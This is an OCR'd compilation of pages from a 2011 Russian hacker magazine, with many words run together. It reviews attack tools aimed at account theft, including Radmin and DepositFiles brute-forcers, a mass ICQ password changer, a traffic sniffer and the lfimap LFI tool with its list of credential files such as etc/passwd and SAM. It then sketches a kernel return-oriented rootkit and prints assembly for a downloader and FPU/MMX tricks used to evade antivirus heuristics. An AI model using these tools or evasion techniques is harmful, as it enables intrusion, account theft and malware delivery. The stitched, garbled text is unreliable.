книги хакеры / журнал хакер / 147_Optimized

X-TOOLS

Программы для хакеров

Radmin будет наказан!

ПочтигодназадяужеописывалвнашейрубрикезамечательныйбрутдляRadmin подназваниемLamescan. Насталовремяпредставитьновуюверсиюэтойрульнойпрограммы. Итак, Lamescan 3 — этотулзадлявосстановлениязабытыхпаролейксерверамRadmin 2.x илогинов/паролейксерверамRadmin 3.x. Возможностииособенностипроги:

•Многопоточность;

•брут серверов Radmin 2.x и 3.x по словарю;

•специальный многопоточный сканер портов с пинговкой и поддержкой диапазонов любого размера, а также группировкой хостов по результатам сканирования;

•возможность сохранения/загрузки состояния сканирования;

•экспорт сбрученных хостов в CSV

или HTML;

•запуск viewer’а для сбрученных хостов прямо из программы (логин/ пароль вводится автоматически);

•поддержка SOCKS для TCPсоединений;

•подробнейший хелп с описанием протокола авторизации Radmin;

•открытый исходный код;

•автоматическая проверка обновлений.

Вкачествебонусананашемдискетысможешь найтиипрогуIpGeoBase отмембераАнтичата HIMIKAT’а. Даннаявещьпредназначенадля генерациидиапазоновадресовдлябрутапо конкретнымокругам, регионамигородам.

Меняем пароли ICQ

Наочередивнашемсегодняшнемобзоре известнейшаявасечныхкругахпрогадля массовойсменыпаролейнауинах. Пароль меняется, дажеесливнемприсутствуют спецсимволыиликириллическиесимволы. Дляначалаработыстулзойнеобходимовыбратьфайлсоспискомвида

«номер;пароль», затемвыбратьпарольдля замены(фиксированныйилислучайный, такжеможновыбратьсимволы, изкоторых будетформироватьсяслучайныйпароль). Далееставимпаузумеждусменойпароля(0, еслииспользуютсяпрокси) иопционально выбираемфайлспроксями.

Принажатиикнопки«Старт» создается файл«newpass_дата_время.txt», вкоторыйбудутпомещатьсяданныевформате «номер;новый_пароль;старый_пароль».

Следуетучесть, чтовозможенслучай, когда запроснаизменениепаролявыслан, аответ неполучен— программавыдаст«Request failed. Check the old and new password2».

Втакомслучаеможетпригодитьсястарый сохраненныйпароль.

Авторпассченджерасудовольствием ответитнавсетвоивопросытут: avtuh. ru/2010/04/26/extra-icq-password-changer- mass.html.

Программа: 0x4553-Intercepter ОС: Windows 2000/XP/2003 Server/Vista/2008 Server/7 Автор: ares

Наочередизнаменитыйснифер0x4553Intercepter отрусскогоразработчикаares’а. Даннаяпрогапредставляетизсебяцелый хакерскийкомбайниумеетследующее:

Снифаем правильно

•Перехватывать пароли ICQ/IRC/AIM/ FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/ HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/ VNC/MYSQL/ORACLE

•перехватывать сообщения ICQ/AIM/ JABBER/YAHOO/MSN/GADU-GADU/IRC/MRA

•менять MAC-адреса сетевых карт;

•просматривать трафик в сыром виде,

свозможностью фильтрации;

•перехватывать данные на неопределенных портах с помощью специального eXtreme-режима;

•сохранять пакеты в файл pcap-формата

ипроводить оффлайн-анализ дампов;

•удаленно анализировать трафик через

RPCAP демона;

•работать со встроенным ARP poison;

•перехватывать и сохранять в emlформате сообщения POP3 и SMTP;

•сканировать ARP и DHCP (также в прогу включен и невидимый DHCP сервер).

Описыватьработувсехфункцийснифера вданнойрубрикебессмысленно, поэтому советуюзаглянутьнаегоофициальныйсайт intercepter.nerf.ru ивнимательноизучить любезнопредоставленныеавторомвидеотуториалыкпроге.

Программа: UnShortURL ОС: Windows 2000/XP/2003 Server/Vista/2008 Server/7 Автор: avtuh

Известно, чтокороткиессылки, генерируемыеспециальнымисервисамидляукорачиванияссылок, могутскрыватьзасобойне вполнебезопасныйконтент. Этапрограмма поможеттебеувидеть, кудаведутпотенциальноопасныессылки.

Прогаследитзабуферомобменаи, если находитвнемкороткуюсгенерированную ссылку, ищет, кудаидетперенаправление поней. Результатвыдаетсяввидевсплывающегосообщения.

ПослезапускаUnShortURL отображается

втрееввидезеленогофлажка. Менюдля управлениявызываетсялевойкнопкой мыши. Изменюможноотключитьили включитьмониторингбуфера. Меню«Link» позволяетдобавить/удалитьсервисыкороткихссылок.

Подефолтуподдерживаютсяследующие популярныесервисы:

ad.vu, adjix.com, alturl.com, b23.ru, bit.ly, budurl.com, clck.ru, cli.gs, fly2.ws, goo.gl, idek.net, is.gd, moourl.com, murl.kz, nn.nf, nsfw.in, ow.ly, pnt.me, shorl.com, sn.im, snipurl.com, tiny.cc, tinyurl.com, tr.im, u.nu, url.ie, w3t.org, www.x.se, yep.it, yourls.org

Кликповсплывающемусообщениюприведеткоткрытиюконечнойссылки(туда, куда перенаправляеткороткая). Программаподдерживаетмногократныеперенаправления покороткимссылкам.

Заподдержкойиответаминавопросыобращайсянаофициальнуюстраницупрограм-

мы: avtuh.ru/2010/06/30/unshorturl.html.

Программа:DepositFiles Brute ОС:Windows 2000/XP/2003 Server/Vista/2008 Server/7 Автор: Человек

Брут аккаунтов depositfiles.com

Оченьчасто, когдавозникаетнеобходимостьбыстроибезболезненноскачать что-либосизвестногофайлообменника depositfiles.com, тебеприходитсяпросматриватьдесяткинавязчивыхбаннерови ждатькакое-товремяпередпоявлением ссылкинаскачивание. Приэтомскачивание вбесплатномрежимепроходитнакрайне невысокойскорости. ИменновтакихслучаяхтебепригодитсяутилитаDepositFiles Brute.

Особенностибрутфорсастандартныдля программтакогорода:

•Брут по списку логин:пароль;

•многопоточность;

•работа без прокси;

•простота в использовании;

•высокая скорость.

Спомощьюданнойпрограммытылегкосможешьзаполучитьнеобходимоеколичество голд-аккаунтовдляудобногоскачивания файлов.

Программа:lfimap ОС:*nix/win

Автор: Augusto Pereyra

Раскручиваем инклуды

Lfimap — этокрайнеполезнаятулзадля автоматизациидействий, направленныхне нанахождениеуязвимости, ауженаизвлечениепользыссайта, уязвимогокLFI (local file include).

Особенностиифункционалпроги:

•Кроссплатформенность (написана на Питоне);

•автоматическое определение ОС

(windows, linux);

•автоматическое обнаружение корня файловой системы;

•поиск дефолтных файлов для серверов на базе linux и windows;

•поиск паролей в файлах конфигурации;

•поддержка basic-аутентификации

(параметры «--user» и «--passw»);

•подстановка null-байта для обхода контролирующих механизмов (параметр

«--null»);

•формирование отчета о работе

(параметр «--output»);

• поддержка proxy (параметр

«--proxy»).

Запускаетсяскриптследующимобразом:

python lfimap.py -t http://www.test. com/ss.php?page=[LFI]

Призапускебезпараметровтысможешь увидетьнебольшойхелппоскрипту. ПримердефолтныхфайловразныхОС, которыебудетискатьпрога:

Linux var/log/httpd/access_log proc/self/environ proc/version var/log/apache2/access.log var/log/httpd-access.log

usr/localetc/apache22/httpd.conf

etc/apache2/apache2.conf

etc/httpd/conf/httpd.conf

var/log/mysqld.log

etc/mysql/my.cnf

var/lib/mysql/mysql/user.MYD

etc/inittab

etc/sysctl.conf

etc/passwd

etc/ts.conf

etc/clamav/clamd.conf

etc/clamav/freshclam.conf etc/ca-certificates.conf

Windows boot.ini

AppServ/MySQL/data/mysql/user.MYD

WINDOWS/system32/driversetc/hosts

WINDOWS/repair/SAM

Каквидишь, lfimap — этооченьхорошее средстводляавтоматизацииобычных рутинныхдействийсинклудами.

Программа:ICQPassword Recalling

ОС: Windows2000/XP/2003 Server/Vista/2008Server/7 Автор:Karas

Восстанавливаем пароль от Аси

Взаключениеспешупредставитьтвоему вниманиюещеоднуполезнуюасечнуюпро-

гу— ICQ Password Recalling.

Наверняка ты когда-либо забывал пароль от ICQ, сохраненный в клиенте (QIP, Jimm, официальная ICQ и так далее), долго медитировал и пытался его вспомнить. Конечно, можно воспользоваться системой ретрива для установки нового пароля или же использовать различные программы для расшифровки хешей, сохраненных в клиентах. Но первый способ неудобен и длителен, а второй — не всегда срабатывает, поэтому проще всего воспользоваться данной программой, которая имитирует сервер авторизации, ждет подключения, кушает UIN и пароль, а затем сообщает его тебе.

Схемаработыспрогойдостаточнопроста:

1.ЗапускаемICQ клиентссохраненнымв немпаролем.

2.УказываемсвойIP вкачествесервера авторизации(можноуказать127.0.0.1).

3.Пробуемподключиться.

4.Видимсвойпароль(есливклиентеотмеченагалка«Безопасныйвход», тулзане сможеттебепомочь).

5.Меняемсерверподключениявклиенте обратнонаlogin.icq.com.

Авторсудовольствиемответитнатвои вопросыипредложениявтопикеforum. asechka.ru/showthread.php?t=109235. z

На сегодняшний день использование драйверов для взаимодействия с «нутром» системы (особенно для систем безопасности Windows) — устоявшаяся практика. Многие программы используют их как окно для доступа в нулевое кольцо. Впрочем, тут стоит отметить один очевидный факт: кроме основных функций подобные драйверы оснащены также механизмами взаимодействия, предназначенными для обмена данными между драйвером и программными компонентами, работающими в пользовательском режиме. Заметь, код, работающий на высоком уровне привилегий, получает данные от кода, работающего на уровне привилегий более низком. Это значит, что на плечи разработчика

ложится непростая задача – обеспечить проверку таких данных, потому что если пустить этот процесс на самотек, то в лучшем случае будут грабли со стабильным функционированием такого драйвера, в худшем – можно поставить под угрозу всю ОС.

Уязвимости в ядре? Их есть у меня!

Уязвимостей в ядре Windows не так много, но время от времени они появляются: иногда в виде призрачных намеков, иногда – в виде убедительных отверстий толщиной с главный калибр линкора «Миссури». Вспомним, например, 2008 год, когда впервые поя-

IOCTL Fuzzer в действии

вилась информация об уязвимости MS08-025, эксплуатация которой позволяла выполнить произвольный код в режиме ядра и достичь благодаря этому локального повышения привилегий на операционных системах

Windows XP и Windows Server 2003. Это далеко не пер-

вая уязвимость, которая была обнаружена в win32k. sys, и я абсолютно уверен, что и не последняя. Такая ситуация сложилась в первую очередь из-за того, что изначально графическая подсистема работала в режиме пользователя (по Windows NT 4.0 включительно), но позже, чтобы сократить количество ресурсоемких операций по переключению потока в режим ядра, разработчики Windows решили перенести графическую подсистему в Ring-0. Однако, в силу достаточно большого объема кода и архитектурных особенностей, во время этого переноса не было уделено достаточно внимания вопросам безопасности, что и способствовало появлению в win32k.sys большого количества уязвимостей разной степени опасности.

Вообще подсистема win32k.sys — довольно дырявая штукенция. Например (спасибо Лозовскому за подгон инфы), недавно новая 0-day уязвимость была обнаружена в этой графической подсистеме винды. Атаке под-

вергся WinAPI RtlQueryRegistryValues, используемый для получения различных значений ключей реестра с помощью таблицы запросов и имеющий EntryContext в качестве буфера вывода. Для успешного обхода защиты злоумышленник должен создать поврежденный ключ реестра или управлять ключами, доступ к которым разрешен только обычным пользователям.

Детали общей мозаики

Как я говорил в начале этой статьи, для успешной реализации возвратно-ориентированного руткита нам все же понадобится r0-уязвимость, которая позволит подчинить себе поток выполнения программного кода на ядерном уровне. Точнее, нужен какой-нибудь драйвер, который содержит в себе баг с переполнением буфера, который позволит злоумышленнику овладеть стеком ядра. В основе руткита,

созданного с помощью возвратно-ориентированного кодинга, будет IRP-пакет, а вернее — целый механизм, известный под общим названием «диспетчер ввода-вывода» и призванный взаимодействовать между ring3 и ring0. Существует достаточно много хорошо и не очень документированных системных механизмов, которые могут быть использованы для организации взаимодействия кода пользовательского режима с драйверами режима ядра. Самыми функциональными и наиболее часто используемыми являются те механизмы, которые представляются диспетчером ввода-вывода. В конце концов, именно они и создавались разработчиками операционной системы для подобных задач. Давай вспомним, как обычно организуется работа с диспетчером ввода-вывода со стороны драйвера и приложения.

После загрузки драйвер создает именованный объект ядра «устройство», используя функцию IoCreateDevice. Для обработки обращений к созданным устройствам драйвер ассоциирует со своим объектом набор функций-обработчиков. Эти функции вызываются диспетчером ввода-вывода при выполнении определенных операций с устройством (открытие, закрытие, чтение, запись и так далее), а также в случае некоторых системных событий (например, завершения работы системы или монтирования раздела жесткого диска). Структура, описывающая объект «драйвер», называется DRIVER_OBJECT,

а эти функции – IRP-обработчиками (IRP — I/O Request Packet). Их адреса драйвер помещает в поле

DRIVER_OBJECTÆMajorFunction, которое является массивом указателей на IRP-обработчики и имеет следующий прототип:

typedef NTSTATUS

(*PDRIVER_DISPATCH) (

__in struct _DEVICE_OBJECT *DeviceObject, __in struct _IRP *Irp

);

dvd

НаDVD-дискеты найдешьклассный труд«Уязвимостив драйверахрежима ядрадляWindows»

отисследователя

Esagelab Дмитрия Олексюка.

HTTP://WWW

links

Дваинтересныхблога:

•j00ru.vexillium.org;

•ivanlef0u.tuxfamily.org.

1970

1972

1980

1990

1988

2010

2009

Параметр DeviceObject указывает на конкретное устройство (у одного драйвера их может быть много), а Irp – на структуру, содержащую различную информацию о запросе к устройству: контрольный код, буферы для входящих и исходящих данных, статус завершения обработки запроса и многое другое.

Эксплойт?

Мы постараемся заэксплойтить самую распространенную и часто встречающуюся уязвимость переполнения буфера. Это легко сделать путем перезаписи буфера в созданном драйвером «устройстве», тем самым заместив возвращаемое значение в

стеке таким образом, чтобы оно указывало на последовательность ядерных инструкций «POP ESP; RET», а также следующее в стеке значение, чтобы оно указывало на точку входа в возвратно-ориентированную программу.

Переписав эти восемь байт, мы сможем сконфигурировать стек так, чтобы он указывал на начало нашей возвратноориентированной программы. Любой подобный небезопасный код позволяет легко реализовать нашу атаку: простая уязвимость в ядре или любом драйвере, загруженном в адресное пространство ядра, является достаточным условием, чтобы скомпрометировать всю систему и выполнить злонамеренный

возвратно-ориентированный код. Правда, для реализации этих коварных планов нужно решить один существенный вопрос

— куда запихнуть имидж нашей программы? Есть два пути. Во-первых, эксплойт может перезаписать весь стек ядра нашим кодом, однако стек не резиновый, и в него может влезть (в случае Windows) всего три страницы, то есть 12 Кб. Во-вторых, эксплойт должен (по крайней мере, на начальном этапе выполнения) постараться продержать имидж самой программы в пользовательском режиме. Для решения этой проблемы идеально будет написать загрузчик нашего будущего руткита. Но об этом — чуть ниже.

Подводные камни

Их тоже полно. Одно из главных препятствий, возникающих на пути реализации возвратно-ориентированного руткита, — то, как Windows манипулирует своим ядерным стеком. Все существующие версии Windows используют в ядре так называемые уровни запросов прерываний (IRQL), являющиеся настоящей головной болью для системных разработчиков, пишущих драйвера. Если ты не знаешь, что такое IRQL, то совсем уж вкратце — это механизм приоритетов в ядре, весьма похожий на уровень приоритета потоков в юзермодных программах.

У каждого прерывания есть свой заранее определенный уровень. Когда возникает прерывание, то в первую очередь осуществляется сравнение с уровнем IRQL, который имеет текущий поток. В случае, если новое прерывание обладает более низким IRQL, исполнение программного кода от нового прерывания ставится в очередь до лучших времен — новое прерывание хода исполнения программы не может его заморозить, если оно ниже по уровню. Для грамотного читателя все это, конечно, не новость. Но самое интересное при этом происходит при попытке доступа к подкачиваемой памяти (то есть той, которую ядро периодически сбрасывает на жесткий диск), поскольку это имеет определенные последствия. Главное, что следует уяснить — доступ к подкачиваемой памяти сильно ограничен на высоких IRQL'ах, и при реализации кода это приводит к проблемам (читай — BSOD'ам). Ведь всякий раз, когда происходят прерывания (и, следовательно, они должны быть обработаны ядром Windows), ядро, как правило, начинает оперировать со стеком. При этом обработчик прерывания выделяет память ниже текущего значения ESP, нежели обработчик стека. И хотя такое поведение ядра вполне приемлемо в общей ситуации, в нашем случае это может привести к нежелательным последствиям, поскольку значения стека, находящиеся ниже текущего ESP,

XÀÊÅÐ 04 /147/ 2011

могут серьезно подпортить выполнение кода руткита. Решить эту проблему, как я говорил ранее, довольно просто — для этого нужен загрузчик. Можно сделать так: загрузчик должен выделить память в неподкачиваемом (nonpaged) пуле, который никогда не сбрасывается на жесткий диск, и скопировать туда тело руткита из пользовательского пространства перед тем как он будет запущен. При этом, заметь, имидж находится в пользовательском пространстве, что ограничивает способность механизмов защиты ядра запретить загрузку нашего руткита.

Когда общий ход выполнения программы захочет вернуться из некоей подпрограммы, это может привести к краху, поскольку есть вероятность того, что точка возврата перезаписана обработчиком прерывания. Чтобы избежать таких проблем, нужно также предусмотреть некую опцию динамического восстановления «поврежденного» участка кода, но уж это остается тебе в качестве домашнего задания.

Кроме того, если в стеке попадутся адреса из подкачиваемой памяти, не избежать проблем с IRQL, что неминуемо приведет к «синим экранам».

Это проблема решается использованием функции VirtualLock, которая позволит залочить в памяти определенное количество страниц процесса и не даст ядру скинуть эти страницы на диск. Однако, по неизвестным для меня причинам, это ноу-хау не всегда работает с областями памяти размером больше одной страницы.

Оффтоп

Большинство уязвимостей, возникающих из-за неправильной обработки данных, которые драйвер получает в IRP-запросе, довольно однотипны, и мы уже не раз о них писали. Знающие люди говорят, что некорректная обработка входных данных не является разовым явлением и, найдя одну уязвимость, можно с большой вероятностью найти и другую, проследив либо общий ход выполнения программы, либо другие участки программного кода, выполняющие аналогичную задачу. С такой задачей хорошо справляется утилитка IOCTL Fuzzer (code.google. com/p/ioctlfuzzer), действие которой заключается в генерации и отправке заведомо некорректных входных данных с расчетом на то, что код, который их обрабатывает, попросту не учитывает возможность присутствия подобных некорректностей.

На самом деле, таких уязвимостей переполнения буфера, которые можно заэксплойтить при помощи фич возвратноориентированного кодинга в сторонних драйверах, вагон и маленькая тележка. z

075

От редакции

АлександрЛозовский, редакторрубрики

С давних времен бытует миф о том, что запрятать от эвристики прогу, написанную на ассемблере, не так просто. Лаборатория ][ проверила это утверждение. Результаты традиционно плачевные — наш даунлоадер в первозданном виде был детектирован едва ли половиной антивирусов, представленных на ВирусТотале. Что уж говорить о более извращенных тестах? Да, мое увлечение ВирусТоталом можно подвергнуть справедливой критике

— ведь на этом сервисе тусуются антивирусы с несколько устаревшими движками (кажется, это было сделано как раз для того, чтобы снизить полезность сервиса для вирмэйкеров).

Тем не менее, общую картину эта проверка дает. Разумеется, в тесте, проведенном нашей лабораторией, были использованы самые последние версии указанных антивирусов — с самыми новыми движками и самыми свежими базами. Впрочем, базы тут не при чем. Все сорцы и бинарники, описанные в статье, ты можешь найти на нашем диске. Да, кстати, не спеши удивляться, если у тебя ВирусТотал или твой домашний антивирус будут давать несколько лучшие результаты — к моменту попадания журнала в твои руки антивирусные конторы уже могут принять меры.

Поехали!

В качестве конкретных продуктов я использовал топовые решения каждой компании:

•Symantec — Norton Internet Security 2011;

•McAfee — McAfee Total Protection;

•Trend Micro — Titanium Maximum Security;

•Sophos — Endpoint Security and Data Protection.

Как я уже упоминал, тестировать мы будем важнейший компонент любого антивируса — эвристическую защиту. Методология довольно простая: я скачивал пробную версию каждого продукта, выставлял «максимальные» настройки (чтобы все было честно), а затем сканировал каждый из пяти файлов. А теперь поподробнее о файлах.

В этом краш-тесте я решил проверить, как обстоят дела у наших подопытных с эмулированием инструкций FPU, MMX и SSE. Ниже будут приводиться интересные фрагменты программного кода файлов, использованных в тестировании (полные листинги ты найдешь на нашем DVD). Для начала я сделал простенький Downloader на ассемблере. В качестве компилятора выступал masm32v10. Все довольно просто и очевидно:

start:

push 0

push 0

push offset PathToSave push offset TargetURL

Первый тест. Все довольны — 21 из 42-х антивирусов распознали угрозу

push 0 call eax

push offset shell32Str call LoadLibraryA

push offset executefunc push eax

call GetProcAddress

push 0 push 0 push 0

push offset PathToSave push offset OpenString push 0

call eax

push 0

call ExitProcess

Что же в результате? С этим «чудовищным троянским конем» справился только Sophos. Тройка лидеров отдохнула.

Отлично, идем дальше. Добавим в код последнего «вируса» проверки, связанные с использованием инструкций FPU-набора.

start:

xor eax, eax finit

Пятый тест. Народ явно не справляется!

push 0 push 1

fld qword ptr [esp] mov dword ptr [esp], 0

mov dword ptr [esp + 4], 0 fst qword ptr [esp]

mov eax, [esp] test eax, eax jz Exit

Суть этой проверки чрезвычайно проста. Вначале в стек вносятся два двойных слова — 0x00000000 и 0x00000001. Далее в регистр ST0 сопроцессора из памяти вносится учетверенное слово по адресу, который содержит регистр ESP. Таким образом, регистр ST0 содержит ненулевое значение. Затем с помощью двух MOV’ов содержимое памяти по [ESP] и [ESP+4] обнуляется. А теперь — самое последнее и самое главное: QWORD из ST0 копируется в память по [ESP], и полученное значение по [ESP] копируется в регистр EAX. Антивирус обязан правильно обработать все инструкции, иначе финальная проверка TEST EAX, EAX будет выполнена некорректно. Если просто пропускать все FPU-инструкции, то в регистре EAX окажется ноль и произойдет вызов ExitProcess.

Однако хитрый Sophos справился и с этим тестом. Тогда я решил использовать редко встречаемые MMX инструкции.

start:

xor eax, eax

movq MM0, QWORD_VAL push 0